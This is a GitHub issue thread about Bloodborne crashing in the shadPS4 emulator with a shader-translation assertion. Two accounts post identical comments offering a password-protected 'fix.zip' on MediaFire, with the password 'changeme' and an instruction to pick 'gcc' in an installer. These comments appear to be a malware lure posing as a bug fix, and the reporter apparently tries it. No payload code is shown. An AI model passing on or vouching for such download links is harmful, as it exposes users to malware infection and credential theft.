### ISSUE TITLE
 <Critical> structured_control_flow.cpp:operator():832: Assertion Failed! Shader translation has failed

### ISSUE THREAD

**Issue by daastiks** [shadps4-emu/shadps4-game-compatibility#477]
### Game Name

Bloodborne

### Game code

CUSA03173

### Game version

v01.09

### Used emulator's version (only released versions are acceptable)

v0.2.0

### Current status

Ingame

### Error

 <Critical> structured_control_flow.cpp:operator():832: Assertion Failed!
Shader translation has failed

### Description

After coplete creating  character  game has been  loading and has been crashed   only after creating char 

### Log File

[shad_log.txt](https://github.com/user-attachments/files/16745155/shad_log.txt)

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by daastiks** [comment]
![image](https://github.com/user-attachments/assets/e627cc0d-4626-4eaf-943e-693f0505e1dd)

**Comment by daastiks** [comment]
or where i need use this fix ? on game folder?

**Comment by daastiks** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

![image](https://github.com/user-attachments/assets/84db9ca9-a134-48f0-bc29-98168465c6ab)

**Comment by georgemoralis** [comment]
not a proper format

**Comment by nackedsnake** [comment]
not a proper format of?
